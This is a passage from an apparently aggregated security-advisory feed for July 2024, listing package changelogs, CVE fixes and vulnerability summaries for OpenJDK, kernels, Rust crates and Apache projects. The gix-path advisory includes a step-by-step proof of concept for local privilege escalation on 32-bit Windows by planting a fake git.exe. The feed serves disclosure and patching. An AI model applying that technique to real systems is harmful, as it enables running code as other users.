[1:17.0.12.0.6-0.1.ea]
- generate_source_tarball.sh: Use tar exclude options for VCS files
- generate_source_tarball.sh: Improve VCS exclusion

[1:17.0.12.0.6-0.1.ea]
- generate_source_tarball.sh: Update examples in header for clarity
- generate_source_tarball.sh: Cleanup message issued when checkout already exists
- generate_source_tarball.sh: Create directory in TMPDIR when using WITH_TEMP
- generate_source_tarball.sh: Only add --depth=1 on non-local repositories
- icedtea_sync.sh: Reinstate from rhel-8.9.0 branch
- Move maintenance scripts to a scripts subdirectory
- discover_trees.sh: Set compile-command and indentation instructions for Emacs
- discover_trees.sh: shellcheck: Do not use -o (SC2166)
- discover_trees.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- discover_trees.sh: shellcheck: Double-quote variable references (SC2086)
- generate_source_tarball.sh: Add authorship
- icedtea_sync.sh: Set compile-command and indentation instructions for Emacs
- icedtea_sync.sh: shellcheck: Double-quote variable references (SC2086)
- icedtea_sync.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: Set compile-command and indentation instructions for Emacs
- openjdk_news.sh: shellcheck: Double-quote variable references (SC2086)
- openjdk_news.sh: shellcheck: Remove x-prefixes since we use Bash (SC2268)
- openjdk_news.sh: shellcheck: Remove deprecated egrep usage (SC2196)
- generate_source_tarball.sh: Output values of new options WITH_TEMP and OPENJDK_LATEST
- generate_source_tarball.sh: Double-quote DEPTH reference (SC2086)
- generate_source_tarball.sh: Avoid empty DEPTH reference while still appeasing shellcheck

[1:17.0.12.0.6-0.1.ea]
- Update to jdk-17.0.12+6 (EA)
- Add openjdk-17.0.12+6-ea.tar.xz to .gitignore
- Set updatever to 12
- Set buildver to 6
- Set rpmrelease to 1
- Set is_ga to 0
- Update sources to openjdk-17.0.12+6-ea.tar.xz
- Require tzdata-java 2024a at runtime and for build (JDK-8325150)
- Update lcms2 bundled provides to 2.16.0
- Add zlib 1.3.1 bundled provides and zlib-devel build requirement (OPENJDK-3065)
- Label as error a designator mismatch
- Change a fix-me comment to a note instead
- Sync generate_source_tarball.sh from Fedora rawhide

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4568
18.07.2024 03:00:00 oraclelinux [ELSA-2024-4573] java-21-openjdk security update (important)

[1:21.0.4.0.7-1.0.1]
- Add Oracle vendor bug URL [Orabug: 34340155]

[1:21.0.4.0.7-1]
- Update to jdk-21.0.4+7 (GA)
- Update release notes to 21.0.4+7
- Switch to GA mode.
- Sync the copy of the portable specfile with the latest update
- Add missing section headers in NEWS
- ** This tarball is embargoed until 2024-07-16 @ 1pm PT. **
- Resolves: RHEL-47022

[1:21.0.4.0.5-0.1.ea]
- Update to jdk-21.0.4+5 (EA)
- Update release notes to 21.0.4+5
- Limit Java only tests to one architecture using jdk_test_arch
- Actually require tzdata 2024a now it is available in the buildroot
- Resolves: RHEL-45356
- Resolves: RHEL-47399

[1:21.0.4.0.1-0.1.ea]
- Update to jdk-21.0.4+1 (EA)
- Update release notes to 21.0.4+1
- Switch to EA mode
- Bump LCMS 2 version to 2.16.0 following JDK-8321489
- Add zlib build requirement or bundled version (1.3.1), depending on system_libs setting
- Restore NEWS file so portable can be rebuilt
- Sync the copy of the portable specfile with the latest update
- Related: RHEL-45356
- Resolves: RHEL-46028

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4573
18.07.2024 03:00:00 oraclelinux [ELSA-2024-4583] kernel security update (important)

[5.14.0-427.26.1_4.OL9]
- Disable UKI signing [Orabug: 36571828]
- Update Oracle Linux certificates (Kevin Lyons)
- Disable signing for aarch64 (Ilya Okomin)
- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]
- Update x509.genkey [Orabug: 24817676]
- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5
- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]
- Add Oracle Linux IMA certificates

[5.14.0-427.26.1_4]
- net: ena: Fix incorrect descriptor free behavior (Kamal Heib) [RHEL-39217 RHEL-37430] {CVE-2024-35958}
- tcp: Use refcount_inc_not_zero() in tcp_twsk_unique(). (Guillaume Nault) [RHEL-41749 RHEL-39837] {CVE-2024-36904}
- mm/mglru: Revert 'don't sync disk for each aging cycle' (Waiman Long) [RHEL-44418]
- tipc: fix UAF in error path (Xin Long) [RHEL-34848 RHEL-34280] {CVE-2024-36886}
- selftest/cgroup: Update test_cpuset_prs.sh to match changes (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Make cpuset.cpus.exclusive independent of cpuset.cpus (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Delay setting of CS_CPU_EXCLUSIVE until valid partition (Waiman Long) [RHEL-45139]
- selftest/cgroup: Fix test_cpuset_prs.sh problems reported by test robot (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Fix remote root partition creation problem (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Optimize isolated partition only generate_sched_domains() calls (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Fix retval in update_cpumask() (Waiman Long) [RHEL-45139]
- cgroup/cpuset: Fix a memory leak in update_exclusive_cpumask() (Waiman Long) [RHEL-45139]
- ice: implement AQ download pkg retry (Petr Oros) [RHEL-38907 RHEL-17318]
- redhat: include resolve_btfids in kernel-devel (Viktor Malik) [RHEL-43426 RHEL-40707]
- blk-cgroup: fix list corruption from resetting io stat (cki-backport-bot) [RHEL-44977] {CVE-2024-38663}
- misc: rtsx: do clear express reg every SD_INT (David Arcari) [RHEL-39985 RHEL-33706]
- misc: rtsx: Fix rts5264 driver status incorrect when card removed (David Arcari) [RHEL-39985 RHEL-33706]
- netfilter: tproxy: bail out if IP has been disabled on the device (cki-backport-bot) [RHEL-44371] {CVE-2024-36270}
- lib/test_hmm.c: handle src_pfns and dst_pfns allocation failure (cki-backport-bot) [RHEL-44263 RHEL-44261] {CVE-2024-38543}
- r8169: Fix possible ring buffer corruption on fragmented Tx packets. (cki-backport-bot) [RHEL-44039] {CVE-2024-38586}
- net: micrel: Fix receiving the timestamp in the frame for lan8841 (cki-backport-bot) [RHEL-43996] {CVE-2024-38593}
- vt: fix memory overlapping when deleting chars in the buffer (Waiman Long) [RHEL-43379 RHEL-27780] {CVE-2022-48627}
- net/mlx5e: Use a memory barrier to enforce PTP WQ xmit submission tracking occurs after populating the metadata_map (Kamal Heib) [RHEL-42728 RHEL-34192] {CVE-2024-26858}
- locking/atomic: Make test_and_*_bit() ordered on failure (Paolo Bonzini) [RHEL-45896]
- mm/vmscan: fix a bug calling wakeup_kswapd() with a wrong zone index (Rafael Aquini) [RHEL-42659 RHEL-31840] {CVE-2024-26783}
- can: j1939: prevent deadlock by changing j1939_socks_lock to rwlock (Jose Ignacio Tornos Martinez) [RHEL-42379 RHEL-31530] {CVE-2023-52638}
- ethernet: hisilicon: hns: hns_dsaf_misc: fix a possible array overflow in hns_dsaf_ge_srst_by_port() (Ken Cox) [RHEL-42226 RHEL-38715] {CVE-2021-47548}

[5.14.0-427.25.1_4]
- nvme: fix reconnection fail due to reserved tag allocation (Maurizio Lombardi) [RHEL-42896 RHEL-36896] {CVE-2024-27435}
- net: hns3: fix use-after-free bug in hclgevf_send_mbx_msg (cki-backport-bot) [RHEL-43625] {CVE-2021-47596}
- scsi: sg: Avoid race in error handling & drop bogus warn (Ewan D. Milne) [RHEL-36106 RHEL-35659]
- scsi: sg: Avoid sg device teardown race (Ewan D. Milne) [RHEL-36106 RHEL-35659]
- netfilter: nf_tables: use timestamp to check for set element timeout (Florian Westphal) [RHEL-38032 RHEL-33985] {CVE-2024-27397}
- netfilter: nft_set_rbtree: Remove unused variable nft_net (Florian Westphal) [RHEL-38032 RHEL-33985]
- netfilter: nft_set_rbtree: prefer sync gc to async worker (Florian Westphal) [RHEL-38032 RHEL-33985]
- netfilter: nft_set_rbtree: rename gc deactivate+erase function (Florian Westphal) [RHEL-38032 RHEL-33985]
- netfilter: nf_tables: de-constify set commit ops function argument (Florian Westphal) [RHEL-38032 RHEL-33985]
- octeontx2-af: avoid off-by-one read from userspace (Kamal Heib) [RHEL-40486 RHEL-39873] {CVE-2024-36957}

https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4583
18.07.2024 19:46:06 rustsec [RUSTSEC-2024-0355] gix-path can use a fake program files location (medium)

### Summary

When looking for Git for Windows so it can run it to report its paths, `gix-path` can be tricked into running another `git.exe` placed in an untrusted location by a limited user account.

### Details

Windows permits limited user accounts without administrative privileges to create new directories in the root of the system drive. While `gix-path` first looks for `git` using a `PATH` search, in version 0.10.8 it also has a fallback strategy on Windows of checking [two hard-coded paths](https://github.com/Byron/gitoxide/blob/6cd8b4665bb7582f744c3244abaef812be39ec35/gix-path/src/env/git.rs#L9-L14) intended to be the 64-bit and 32-bit Program Files directories:

```rust
/// Other places to find Git in.
#[cfg(windows)]
pub(super) static ALTERNATIVE_LOCATIONS: &[&str] = &[
    "C:/Program Files/Git/mingw64/bin",
    "C:/Program Files (x86)/Git/mingw32/bin",
];
```

Existing functions, as well as the newly introduced `exe_invocation` function, were updated to make use of these alternative locations. This causes facilities in `gix_path::env` to directly execute `git.exe` in those locations, as well as to return its path or whatever configuration it reports to callers who rely on it.

Although unusual setups where the system drive is not `C:`, or even where Program Files directories have non-default names, are technically possible, the main problem arises on a 32-bit Windows system. Such a system has no `C:\Program Files (x86)` directory.

A limited user on a 32-bit Windows system can therefore create the `C:\Program Files (x86)` directory and populate it with arbitrary contents. Once a payload has been placed at the second of the two hard-coded paths in this way, other user accounts including administrators will execute it if they run an application that uses `gix-path` and do not have `git` in a `PATH` directory.

(While having `git` found in a `PATH` search prevents exploitation, merely having it installed in the default location under the real `C:\Program Files` directory does not. This is because the first hard-coded path's `mingw64` component assumes a 64-bit installation.)

### PoC

On a 32-bit (x86) Windows 10 system, with or without Git for Windows installed:

1. Create a limited user account in `lusrmgr.msc` or the Settings application.
2. Log in with that account and, using Windows Explorer or the `mkdir` command in PowerShell, create the directories `C:\Program Files (x86)\Git\mingw32\bin`. Although a limited user account cannot create regular files directly in `C:\`, it can create directories including one called `Program Files (x86)`.
3. Place a copy of `C:\Windows\system32\calc.exe` in `C:\Program Files (x86)\Git\mingw32\bin` and rename it from `calc.exe` to `git.exe`. A different test payload may be used if preferred, and the executable need not already be signed or trusted.
4. Log out, and log in as a different user. This user may be an administrator.
5. If `gitoxide` is not installed, install it. If `cargo install gitoxide` is used for the installation, then the version of `gix-path` used in the installation can be observed.
6. The vulnerability is only exploitable if `git` cannot be found in a `PATH` search. So, in PowerShell, run `gcm git` to check if `git` is present in the `PATH`. If so, temporarily remove it. One way to do this is for the current shell only, by running `$env:PATH` to inspect it and by assigning `$env:PATH = '...'` where `...` omits directories that contain `git`.
7. Some commands that can be run outside a repository, and most commands that can be run inside a repository, will run the Calculator or other payload at least once per invocation. Try `gix clone foo` or, inside of a repository, `gix status`, `gix config`, `gix is-changed`, `gix fetch`, `ein t hours`, or `ein t query`. This is not exhaustive; most other `gix` and `ein` commands that access existing repository state or a network resource likewise run the payload.

### Impact

Only Windows is affected. Exploitation is unlikely except on a 32-bit system. In particular, running a 32-bit build on a 64-bit system is not a risk factor. Furthermore, the attacker must have a user account on the system, though it may be a relatively unprivileged account. Such a user can perform privilege escalation and execute code as another user, though it may be difficult to do so reliably because the targeted user account must run an application or service that uses `gix-path` and must not have `git` in its `PATH`.

The main exploitable configuration is one where Git for Windows has been installed but not added to `PATH`. This is one of the options in its installer, though not the default option. Alternatively, an affected program that sanitizes its `PATH` to remove seemingly nonessential directories could allow exploitation. But for the most part, if the target user has configured a `PATH` in which the real `git.exe` can be found, then this cannot be exploited.

This vulnerability is comparable to [CVE-2022-24765](https://github.com/git-for-windows/git/security/advisories/GHSA-vw2c-22j4-2fh2), in which an uncontrolled path like `C:\.git\config`, which a limited user can create, could supply configuration used by other users. However, in this case, exploitation is slightly simpler because, rather than using configuration, an executable is directly run.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0355
18.07.2024 23:21:22 maven [MAVEN:GHSA-6523-JF4R-C962] Apache StreamPipes has potential remote code execution (RCE) via file upload (high)

Unrestricted Upload of File with dangerous type vulnerability in Apache StreamPipes. Such a dangerous type might be an executable file that may lead to a remote code execution (RCE). The unrestricted upload is only possible for authenticated and authorized users.

This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6523-JF4R-C962

18.07.2024 23:19:48 maven [MAVEN:GHSA-9GR7-GH74-QG9X] Apache StreamPipes has possibility of SSRF in pipeline element installation process (moderate)

Server-Side Request Forgery (SSRF) vulnerability in Apache StreamPipes during installation process of pipeline elements. Previously, StreamPipes allowed users to configure custom endpoints from which to install additional pipeline elements. These endpoints were not properly validated, allowing an attacker to get StreamPipes to send an HTTP GET request to an arbitrary address.

This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9GR7-GH74-QG9X

18.07.2024 23:16:27 maven [MAVEN:GHSA-2QPH-V9P2-Q2GV] Apache StreamPipes potentially allows creation of multiple identical accounts (moderate)

Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in Apache StreamPipes in user self-registration. This allows an attacker to potentially request the creation of multiple accounts with the same email address until the email address is registered, creating many identical users and corrupting StreamPipes' user management.

This issue affects Apache StreamPipes: through 0.93.0. Users are recommended to upgrade to version 0.95.0, which fixes the issue.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2QPH-V9P2-Q2GV
18.07.2024 17:15:35 almalinux [ALSA-2024:4568] java-17-openjdk security update (important)
java-17-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4568

18.07.2024 17:17:58 almalinux [ALSA-2024:4573] java-21-openjdk security update (important)
java-21-openjdk security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4573
18.07.2024 14:24:58 rustsec [RUSTSEC-2024-0354] Usage of non-constant time base64 decoder could lead to leakage of secret key material (low)

Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and `PkDecryption` Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack.

## Impact

The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material.

The impact of this vulnerability is considered low because, to exploit it, the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes. Additionally, the estimated leakage amount is bounded and low according to the referenced paper[[1]].

[1]: https://arxiv.org/abs/2108.04600

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0354
19.07.2024 13:36:03 ubuntu [USN-6896-4] Linux kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-4

19.07.2024 12:36:36 ubuntu [USN-6898-3] Linux kernel kernel vulnerabilities (critical)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-3
19.07.2024 21:34:57 maven [MAVEN:GHSA-4MGG-FQFQ-64HG] Apache CXF allows unrestricted memory consumption in CXF HTTP clients (low)
In versions of Apache CXF before 3.6.4 and 4.0.5 (3.5.x and lower versions are not impacted), a CXF HTTP client conduit may prevent HTTPClient instances from being garbage collected and it is possible that memory consumption will continue to increase, eventually causing the application to run out of memory.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4MGG-FQFQ-64HG

19.07.2024 21:34:50 maven [MAVEN:GHSA-6PFF-FMH2-4MMF] Apache CXF Denial of Service vulnerability in JOSE (moderate)
An improper input validation of the p2c parameter in the Apache CXF JOSE code before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform a denial of service attack by specifying a large value for this parameter in a token.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-6PFF-FMH2-4MMF

19.07.2024 21:34:45 maven [MAVEN:GHSA-5M3J-PXH7-455P] Apache CXF: SSRF vulnerability via WADL stylesheet parameter (high)
A SSRF vulnerability in WADL service description in versions of Apache CXF before 4.0.5, 3.6.4 and 3.5.9 allows an attacker to perform SSRF style attacks on REST webservices. The attack only applies if a custom stylesheet parameter is configured.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-5M3J-PXH7-455P
19.07.2024 12:04:56 ubuntu [USN-6895-3] Linux kernel vulnerabilities (high)
Several security issues were fixed in the Linux kernel.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-3

19.07.2024 13:24:45 almalinux [ALSA-2024:4620] libndp security update (important)
libndp security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4620

19.07.2024 13:26:59 almalinux [ALSA-2024:4617] qt5-qtbase security update (important)
qt5-qtbase security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4617

19.07.2024 13:20:07 almalinux [ALSA-2024:4635] thunderbird security update (important)
thunderbird security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4635

19.07.2024 13:19:10 almalinux [ALSA-2024:4636] libndp security update (important)
libndp security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4636

19.07.2024 13:23:11 almalinux [ALSA-2024:4623] qt5-qtbase security update (important)
qt5-qtbase security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4623

19.07.2024 13:21:37 almalinux [ALSA-2024:4624] thunderbird security update (important)
thunderbird security update
https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4624
19.07.2024 13:11:38 rustsec [RUSTSEC-2024-0356] `UserIdentity::is_verified` not checking verification status of own user identity while performing the check (medium)

The `UserIdentity::is_verified()` method in the matrix-sdk-crypto crate before version 0.7.2 doesn't take into account the verification status of the user's own identity while performing the check and may as a result return a value contrary to what is implied by its name and documentation.

## Impact

If the method is used to decide whether to perform sensitive operations towards a user identity, a malicious homeserver could manipulate the outcome in order to make the identity appear trusted. This is not a typical usage of the method, which lowers the impact. The method itself is not used inside the matrix-sdk-crypto crate.

https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0356
19.07.2024 03:00:00 freebsd [FREEBSD:574028B4-A181-455B-A78B-EC5C62781235] electron29 -- multiple vulnerabilities (high)

Electron developers report: This update fixes the following vulnerabilities:
- Security: backported fix for CVE-2024-6291.
- Security: backported fix for CVE-2024-6293.
- Security: backported fix for CVE-2024-6290.
- Security: backported fix for CVE-2024-6292.

https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:574028B4-A181-455B-A78B-EC5C62781235
21.07.2024 20:28:48 rustsec [RUSTSEC-2024-0357] `MemBio::get_buf` has undefined behavior with empty buffers
Previously, `MemBio::get_buf` called `slice::from_raw_parts` with a null pointer, which violates the function's invariants, leading to undefined behavior. In debug builds this would produce an assertion failure. This is now fixed.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0357
22.07.2024 20:30:20 maven [MAVEN:GHSA-CRJG-W57M-RQQF] DNSJava vulnerable to KeyTrap - Denial-of-Service Algorithmic Complexity Attacks (moderate)

### Impact

Users using the `ValidatingResolver` for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.

### Patches

Users should upgrade to dnsjava v3.6.0

### Workarounds

Although not recommended, only using a non-validating resolver will remove the vulnerability.

### References

https://www.athene-center.de/en/keytrap

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CRJG-W57M-RQQF

22.07.2024 18:30:56 maven [MAVEN:GHSA-MMWX-RJ87-VFGR] DNSJava affected by KeyTrap - NSEC3 closest encloser proof can exhaust CPU resources (moderate)

### Impact

Users using the `ValidatingResolver` for DNSSEC validation can run into CPU exhaustion with specially crafted DNSSEC-signed zones.

### Patches

Users should upgrade to dnsjava v3.6.0

### Workarounds

Although not recommended, only using a non-validating resolver will remove the vulnerability.

### References

https://www.athene-center.de/en/keytrap

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-MMWX-RJ87-VFGR
22.07.2024 19:55:12 maven [MAVEN:GHSA-CFXW-4H78-H7FW] DNSJava DNSSEC Bypass (high)

### Summary

Records in DNS replies are not checked for their relevance to the query, allowing an attacker to respond with RRs from different zones.

### Details

DNS Messages are not authenticated. They do not guarantee that

- received RRs are authentic
- not received RRs do not exist
- all or any received records in a response relate to the request

Applications utilizing DNSSEC generally expect these guarantees to be met, however DNSSEC by itself only guarantees the first two.

To meet the third guarantee, resolvers generally follow an (undocumented, as far as RFCs go) algorithm such as: (simplified, e.g. lacks DNSSEC validation!)

1. denote by `QNAME` the name you are querying (e.g. fraunhofer.de.), and initialize a list of aliases
2. if the ANSWER section contains a valid PTR RRSet for `QNAME`, return it (and optionally return the list of aliases as well)
3. if the ANSWER section contains a valid CNAME RRSet for `QNAME`, add it to the list of aliases. Set `QNAME` to the CNAME's target and go to 2.
4. Verify that `QNAME` does not have any PTR, CNAME and DNAME records using valid NSEC or NSEC3 records. Return `null`.

Note that this algorithm relies on NSEC records and thus requires a considerable portion of the DNSSEC specifications to be implemented. For this reason, it cannot be performed by a DNS client (aka application) and is typically performed as part of the resolver logic.

dnsjava does not implement a comparable algorithm, and the provided APIs instead return either

- the received DNS message itself (e.g. when using a ValidatingResolver such as in [this](https://github.com/dnsjava/dnsjava/blob/master/EXAMPLES.md#dnssec-resolver) example), or
- essentially just the contents of its ANSWER section (e.g. when using a LookupSession such as in [this](https://github.com/dnsjava/dnsjava/blob/master/EXAMPLES.md#simple-lookup-with-a-resolver) example)

If applications blindly filter the received results for RRs of the desired record type (as seems to be typical usage for dnsjava), a rogue recursive resolver or (on UDP/TCP connections) a network attacker can

- In addition to the actual DNS response, add RRs irrelevant to the query but of the right datatype, e.g. from another zone, as long as that zone is correctly using DNSSEC, or
- completely exchange the relevant response records

### Impact

DNS(SEC) libraries are usually used as part of a larger security framework. Therefore, the main misuses of this vulnerability concern application code, which might take the returned records as authentic answers to the request.

Here are three concrete examples of where this might be detrimental:

- [RFC 6186](https://datatracker.ietf.org/doc/html/rfc6186) specifies that to connect to an IMAP server for a user, a mail user agent should retrieve certain SRV records and send the user's credentials to the specified servers. Exchanging the SRV records can be a tool to redirect the credentials.
- When delivering mail via SMTP, MX records determine where to deliver the mails to. Exchanging the MX records might lead to information disclosure. Additionally, an exchange of TLSA records might allow attackers to intercept TLS traffic.
- Some research projects like [LIGHTest](https://www.lightest.eu/) are trying to manage CA trust stores via URI and SMIMEA records in the DNS. Exchanging these allows manipulating the root of trust for dependent applications.

### Mitigations

At this point, the following mitigations are recommended:

- When using a ValidatingResolver, ignore any Server indications of whether or not data was available (e.g. NXDOMAIN, NODATA, ...).
- For APIs returning RRs from DNS responses, filter the RRs using an algorithm such as the one above. This includes e.g. `LookupSession.lookupAsync`.
- Remove APIs dealing with raw DNS messages from the examples section or place a noticeable warning above.

https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CFXW-4H78-H7FW
22.07.2024 17:30:29 ubuntu [USN-6904-1] PyMongo vulnerability (high)
PyMongo could be made to crash or expose sensitive information if it received a crafted BSON.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6904-1

22.07.2024 21:43:42 maven [MAVEN:GHSA-8PXV-X6JQ-5VW9] Apache Syncope Improper Input Validation vulnerability (moderate)
When editing a user, group or any object in the Syncope Console, HTML tags could be added to any text field and could lead to potential exploits. The same vulnerability was found in the Syncope Enduser, when editing "Personal Information" or "User Requests". Users are recommended to upgrade to version 3.0.8, which fixes this issue.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PXV-X6JQ-5VW9

23.07.2024 00:57:53 maven [MAVEN:GHSA-Q9W2-H4CW-8GHP] Apache RocketMQ Vulnerable to Unauthorized Exposure of Sensitive Data (moderate)
For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive Information to an unauthorized actor even if RocketMQ is enabled with authentication and authorization functions. An attacker, possessing regular user privileges or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list. To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend users to use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to version Apache RocketMQ 5.3.0.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-Q9W2-H4CW-8GHP

22.07.2024 05:59:38 ubuntu [USN-6903-1] Thunderbird vulnerabilities (critical)
Several security issues were fixed in Thunderbird.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6903-1

22.07.2024 17:42:25 maven [MAVEN:GHSA-W36W-948J-XHFW] H2O vulnerable to Deserialization of Untrusted Data (high)
The H2O machine learning platform uses "Iced" classes as the primary means of moving Java Objects around the cluster. The Iced format supports inclusion of serialized Java objects. When a model is deserialized, any class is allowed to be deserialized (no class whitelist). An attacker can construct a crafted Iced model that uses Java gadgets and leads to arbitrary code execution when imported to the H2O platform.
https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W36W-948J-XHFW

22.07.2024 00:41:17 composer [PHP:SILVERSTRIPE-FRAMEWORK-2024-32981] CVE-2024-32981 - XSS Vulnerability with text/html base64-encoded payload (medium)
https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-FRAMEWORK-2024-32981

22.07.2024 00:41:17 composer [PHP:SILVERSTRIPE-FRAMEWORK-SS-2024-001] SS-2024-001 - TinyMCE allows svg files linked in object tags
https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-FRAMEWORK-SS-2024-001

22.07.2024 00:41:17 composer [PHP:SILVERSTRIPE-REPORTS-2024-29885] CVE-2024-29885 - Reports are still accessible even when canView is set to false (medium)
https://secdb.nttzen.cloud/security-advisory/composer/PHP:SILVERSTRIPE-REPORTS-2024-29885

23.07.2024 23:39:26 ubuntu [USN-6910-1] Apache ActiveMQ vulnerabilities (critical)
Several security issues were fixed in Apache ActiveMQ.
https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6910-1
23.07.2024 22:09:25 slackware [SSA:2024-205-03] mozilla-thunderbird (critical)

New mozilla-thunderbird packages are available for Slackware 15.0 to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/thunderbird/115.13.0/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2024-31/
    https://www.cve.org/CVERecord?id=CVE-2024-6600
    https://www.cve.org/CVERecord?id=CVE-2024-6601
    https://www.cve.org/CVERecord?id=CVE-2024-6602
    https://www.cve.org/CVERecord?id=CVE-2024-6603
    https://www.cve.org/CVERecord?id=CVE-2024-6604
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.13.0-x86_64-1_slack15.0.txz

**MD5 signatures**

Slackware 15.0 package:
5a94fb8c8ef1abe421365be729502d02  mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
1922a1ac45a5e3bb495ac45640b27f8b  mozilla-thunderbird-115.13.0-x86_64-1_slack15.0.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.13.0-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-205-03
23.07.2024 22:09:08slackware[SSA:2024-205-02] glibc (high)New glibc packages are available for Slackware 15.0 and -current to fix security issues. **Here are the details from the Slackware 15.0 ChangeLog** ```patches/packages/aaa_glibc-solibs-2.33-i586-7_slack15.0.txz: Rebuilt. patches/packages/glibc-2.33-i586-7_slack15.0.txz: Rebuilt. This update fixes security issues: nscd: Stack-based buffer overflow in netgroup cache. nscd: Null pointer crash after notfound response. nscd: netgroup cache may terminate daemon on memory allocation failure. nscd: netgroup cache assumes NSS callback uses in-buffer strings. These vulnerabilities were only present in the nscd binary. For more information, see: https://www.cve.org/CVERecord?id=CVE-2024-33599 https://www.cve.org/CVERecord?id=CVE-2024-33600 https://www.cve.org/CVERecord?id=CVE-2024-33601 https://www.cve.org/CVERecord?id=CVE-2024-33602 (* Security fix *) patches/packages/glibc-i18n-2.33-i586-7_slack15.0.txz: Rebuilt. patches/packages/glibc-profile-2.33-i586-7_slack15.0.txz: Rebuilt.``` **Where to find the new packages** Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/aaa_glibc-solibs-2.33-i586-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-2.33-i586-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-i18n-2.33-i586-7_slack15.0.txz ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/glibc-profile-2.33-i586-7_slack15.0.txz Updated packages for Slackware 